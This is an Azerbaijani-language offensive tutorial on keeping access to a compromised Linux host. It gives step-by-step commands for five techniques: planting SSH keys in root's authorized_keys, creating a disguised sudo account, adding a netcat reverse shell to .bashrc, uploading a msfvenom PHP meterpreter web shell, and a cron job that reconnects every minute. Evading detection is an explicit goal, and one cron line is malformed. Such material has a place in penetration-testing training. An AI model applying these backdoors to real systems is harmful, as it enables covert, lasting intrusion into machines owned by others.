Linux Persistence

Davamlılıq, qarşı tərəfin sistemi yenidən başladıqda, dəyişdirilmiş məlumatlar və onların girişini kəsə biləcək digər fasilələr zamanı girişi saxlamaq üçün istifadə etdiyi üsullardan ibarətdir. Davamlılıq üçün istifadə olunan yollar müxtəlifdir. Və hər birinin özünə məxsus yolları vardır. Müxtəlif senarilərə əsasən biz bu yollardan istifadə etməliyik.

İlkin giriş əldə kifayət deyil, hədəflərinizə davamlı girişi qurmaq və saxlamaq lazımdır.

Persistence taktikaları bölməsində olan altından xətt çəkilmiş texnikalar bizə hədəf sistemdə aydın və metodiki yollarla necə davamlılığı təmin edə biləcəyimizi göstərir.

Aşağıdakı açar texnikaları və alt-texnikaları biz bu bölmədə araşdıracayıq:

1. SSH açarı ilə persistence

2. İcazələri yüksək olan hesab yaratmaq

3. Unix shell də konfigurasiyaları dəyişmək ( .bashrc faylında backdoor yaratmaq kimi)

4. Web shell və ya backdoor

5. Kron jobs

Məqsədimiz sistemə ilkin giriş əldə etdikdən sonra Linux hədəfində persistence (davamlılıq) yaratmaqdır.

Qeyd: Bəzi davamlılıq üsulları uğurla icra olunmaq üçün “root” icazələri tələb edəcək.

SSH açarı ilə persistence

İstifadə edəcəyimiz ilk davamlılıq texnikası parol əsaslı autentifikasiyadan fərqli olaraq SSH açarı əsasında identifikasiyanın yaradılması və istifadəsi prosesidir. Bu davamliliq texnikası, istifadəçi hesabının parolları dəyişdirilərsə bele, hədəf sistemə girişi qorumağa kömək edəcək.

Bu texnikanı yerinə yetirmək üçün siz hədəf sistemə ilkin giriş əldə etməlisiniz və SSH konfiqurasiya faylını dəyişdirmək istəsəniz, “root” imtiyazlarına ehtiyacınız olacaq.

1. İlkin addım SSH açar cütünün yaradılmasıdır, Bunu kali Linux da etmək lazımdır, çünkü biz ssh ilə sistemə bağlanacayıq. Biz bu əmrdən istifadə edəcəyik:

   Copy

   ssh-keygen

2. Aşağıdakı ekran görüntüsündə göstərilən kimi, bu, yaradılacaq public və private açarlar üçün saxlama yerini, həmçinin SSH açarı üçün parol ifadəsini təyin etməyi təklif edəcək. Bu vəziyyətdə standart seçimlərdən istifadə edəcəyik.
3. Public və private açar cütünü yaratdıqdan sonra siz yaratdığınız açıq açarın (id_rsa.pub) məzmununu kopyalamalı və onu hədəf sistemdəki hədəf istifadəçi hesabının .ssh qovluğundakı “authorized_keys” faylına əlavə etməli olacaqsınız. Bu halda, açıq açarı /root/.ssh/authorized_keys-də yerləşən “root” istifadəçinin “authorized_keys” faylına əlavə edəcəyik.

   Qeyd: .ssh kataloqu və “authorized_keys” faylı yoxdursa, onları yaratmalı olacaqsınız, bunu aşağıdakı əmrlərle yerinə yetirməklə etmək olar:

   Copy

   mkdir ~/.ssh
   touch ~/.ssh/authorized_keys

4. Yaraddığınız açıq açarın kontentini “authorized_keys” faylına yerləşdirdikdən sonra o, aşağıda göstərilən ekran görüntüsü kimi olmalidir.
5. Həmçinin .ssh qovluğuna və “authorized_keys” faylına lazımi icazələri tətbiq etmək tövsiyə olunur, bunu aşağıdakı əmrləri yerinə yetirməklə etmək olar:

   Copy

   chmod 700 /root/.ssh
   chmod 600 /root/.ssh/authorized_keys

6. Aşağıdakı ekran görüntüsündə göstərildiyi kimi, yaratdığınız public açarı əlavə etdikdən sonra, indi parol təqdim etmədən hədəflə SSH vasitəsilə bağlantı əldə edə biləcəksiniz.

İndi biz SSH açarları vasitəsilə davamlı girişi uğurla qura bildik və nəticədə parolların dəyişdirilməsinin səbəb olduğu gələcək autentifikasiya xətalarını azaltdıq.

İcazələri yüksək olan hesab yaratmaq

Danışacağımız növbəti davamlılıq texnikası giriş üçün imtiyazlı yerli hesabın yaradılması prosesidir, istifadəçi hesabının parolu dəyişdirilərsə, bu texnika hədəf sistemə girişi saxlamaq üçün istifadə edilə bilər, lakin yerli istifadəçi hesabının yaradılması daha az istifadəçisi və xidmət hesabı olan serverlərdə yeni bir istifadəçi kimi asanlıqla aşkarlanacaq.

Aşkarlanmamaq üçün biz gizli adla istifadəçi hesabı yaradacağıq, bu halda xidmət hesabı kimi birdirmək üçün “ssh” adlı istifadəçi hesabı yaradacağıq.

Qeyd: Linux sistemlərində yeni istifadəçi hesabı yaratmaq üçün sizə “root” imtiyazları tələb olunacaq.

1. Aşağıdakı əmri işlətməklə hədəfdə istifadəçi hesabı yarada bilərik:

   Copy

    useradd -m -s /bin/bash aydnn

2. Hesabı yaratdıqdan sonra istifadəçini "sudo" qrupuna əlavə etməliyik, bu istifadəçiyə inzibati imtiyazlar verəcəkdir, bunu aşağıdakı əmri işlətməklə etmək olar:

   Copy

   usermod -aG sudo aydnn

3. İstifadəçi hesabını “sudo” qrupuna əlavə etdikdən sonra hesab üçün parol təyin etməliyik, bunu aşağıdakı əmri yerinə yetirməklə etmək olar:

   Copy

   passwd aydnn

4. Şifrəni təyin etdikdən sonra istifadəçi hesabının əlavə olunduğunu təsdiqləmək üçün /etc/passwd faylının məzmununu sadalaya bilərik.

   Copy

   cat /etc/passwd

1. İndi SSH parol autentifikasiyası vasitəsilə yeni istifadəçi hesabı ilə autentifikasiya edə bilərsiniz, alternativ olaraq birinci bölmədə yaratdığımız ssh ictimai açarını istifadəçi hesabının ev parolunda “authorized_keys” faylına əlavə edə bilərsiniz.

2. SSH vasitəsilə serverlə autentifikasiya etdikdən sonra sudo əmrindən istifadə etməklə istifadəçi hesabının inzibati imtiyazlara malik olduğunu təsdiqləyə bilərik.

Əvvəlki ekran görüntüsündə göstərildiyi kimi, istifadəçi hesabı inzibati imtiyazlara malikdir və “root” hesaba daxil olmadan və ya onunla qarşılıqlı əlaqədə olmadan sistemdə istənilən əmri işlədə bilər.

Bu hesab, hədəf sistemdə “root” hesabından və ya hər hansı digər qanuni istifadəçi hesablarından istifadə etmədən istədiyiniz zaman arxa qapıya giriş üçün istifadə oluna bilər və hədəfə açıq girişinizin olmasını təmin edir.

Unix shell də konfigurasiyaları dəyişmək

Bu davamlılıq texnikası istifadəçi hesabının .bashrc faylında bizim netcat dinləyicimizə qoşulacaq bash reverse shell əlavə edilməsini əhatə edəcək. .bashrc faylı bash-ı fərdiləşdirmək üçün istifadə edilən konfiqurasiya faylıdır və istifadəçi bash qabığı ilə daxil olduqda yerinə yetirilir.

1. İlk addım mətn redaktoru ilə .bashrc faylının açılmasını əhatə edəcək. Bunu aşağıdakı əmri yerinə yetirməklə etmək olar:

nano .bashrc

1. Faylı mətn redaktoru ilə açdıqdan sonra istifadəçi hər dəfə daxil olduqda bizə reverse shell təmin edəcək sadə bash əmri əlavə edə bilərik. Bunu aşağıdakı əmri əlavə etməklə etmək olar:

nc -e /bin/bash <KALI-IP> <PORT> 2>/dev/null &

1. Aşağıdakı ekran görüntüsündə göstərildiyi kimi, emr Kalinin IP-ni və netcat-in dinlədiyi portu əhatə etməlidir.
2. İstifadəçi hər dəfə istifadəçi hesabına daxil olduqda, .bashrc faylındakı əmr yerinə yetiriləcək və nəticədə aşağıdakı ekran görüntüsündə göstərildiyi kimi sizə netcat dinləyicisində reverse shell təqdim edəcək.

   Biz indi .bashrc faylı vasitəsilə davamliligi qura bildik, bu texnikanın əlavə üstünlüyü var ki, reverse shell qanuni konfiqurasiya faylında gizlədilib, aşkar etmək daha çətindir.

Web shell ve ya backdoor

Bu davamlılıq texnikası PHP web shellinin yaradılması və hədəf serverə yüklənməsini əhatə edir. Hədəf serverin LAMP stack ini işlətdiyini nəzərə alsaq, biz PHP meterpreter payloadi yarada və onu arxa qapı kimi web serverə yükləyə bilərik.

1. İlk addım Msfvenom ilə PHP payloadinin yaradılmasını əhatə edəcək, bunu aşağıdakı əmri işlətməklə etmək olar:

   Copy

   msfvenom -p php/meterpreter/reverse_tcp LHOST=<KALI-IP> LPORT=<PORT> -e php/base64 -f raw > backup.php

2. Paylaod yaratdıqdan sonra PHP teqlərini əlavə etməklə onu dəyişdirməli olacaqsınız ki, skript aşağıdakı ekran görüntüsündə göstərildiyi kimi düzgün icra olunsun.
3. İndi aşağıdakı əmrləri işlətməklə dinləyicini Metasploit ilə qura bilərik:

   Copy

   msfconsole
   use multi/handler
   set payload php/meterpreter/reverse_tcp
   set LHOST <KALI-IP>
   set LPORT <PORT>
   run

4. Növbəti addım yenicə yaratdığımız PHP qabığının veb serverə yüklənməsini əhatə edəcək, bunu Kali VM-də yerli veb server qurmaqla etmək olar:

   Copy

   sudo python -m SimpleHTTPServer 80

5. Sonra onu hədəf mashina endirin:

   Copy

   wget http://<KALI-IP>/backup.php

Bu halda, biz “backup.php” faylını aşağıdakı ekran görüntüsündə göstərildiyi kimi /var/www/html kataloqu altında webserverin root-una yükləyəcəyik.

1. Brauzerinizlə aşağıdakı URL-ə daxil olaraq veb-serverdəki “backup.php” faylına keçməklə hədəfdə meterpreter session əldə edə bilərik:

   Copy

   http://<SERVER-IP>/backup.php

2. Brauzer vasitəsilə daxil olmaq PHP kodunu yerinə yetirməli və nəticədə aşağıdakı ekran görüntüsündə göstərildiyi kimi dinləyicinizdə ölçmə seansı təqdim etməlidir.

   SSH vasitəsilə autentifikasiya etmədən hədəf serverə girişi qoruyub saxlamağa imkan verən meterpreter payload yükləməklə davamlılığı uğurla qura bildik.

Kron jobs

Bu texnika, müəyyən bir cədvəl üzrə dəfələrlə reverse shell command ve ya a web shell yetirərək hədəf sistemə davamlı girişi təmin etmək üçün Cron jobs-dan istifadə etməyi əhatə edir.

Cron müəyyən bir cədvəl üzrə dəfələrlə proqramları, skriptləri və digər əmrləri işlədən vaxta əsaslanan xidmətdir.

Cron sizə seçdiyiniz zamana gore proqram, skript və ya əmr işlətmək imkanı verir, bu Cron jobs-lar daha sonra “crontab” faylında saxlanılır.

1. Crontab faylını redaktə etməklə hədəf sistemə bir cron jobu əlavə edə bilərik, bunu hədəf sistemdə aşağıdakı əmri işlətməklə etmək olar:

   Copy

   crontab -e

2. İndi hər dəqiqə netcat əmrini yerinə yetirəcək yeni bir cron işi əlavə edə bilərik, bu crontab faylına aşağıdakı sətri əlavə etməklə edilə bilər:

   Copy

   * * * * nc <KALI-IP> <PORT> -e /bin/sh

3. Cron jobunu əlavə etdikdən sonra faylı save elemeliyik.
4. İndi Kali-də aşağıdakı əmri işlətməklə netcat dinləyicimizi qura bilərik:

   Copy

   nc -nvlp <PORT>

   Bir dəqiqədən sonra cron jobu yerinə yetiriləcək və siz aşağıdakı ekran görüntüsündə göstərildiyi kimi netcat dinləyicinizdə reverse shell alacaqsiniz.
5. Alternativ olaraq, reverse shell əldə etmək üçün netcat istifadə etmək əvəzinə, əvvəlki bölmədə yaratdığımız və yüklədiyimiz PHP meterpreter shellini yerinə yetirən cron jobu yarada bilərik. Bu, crontab faylına aşağıdakı sətri əlavə etməklə edilə bilər:

   Copy

   * * * * php -f /var/www/html/backup.php

   Aşağıdakı ekran görüntüsündə göstərildiyi kimi, bir dəqiqədən sonra bir meterpreter session achilacaqdir.

   Biz indi dinləyicimizə yenidən qoşulan cron jobu yaratmaqla hədəf serverdə davamlılığı uğurla qura bildik, əlavə olaraq hədəf serverə yüklədiyimiz PHP meterpreter qabığını yerinə yetirən cron jobu da.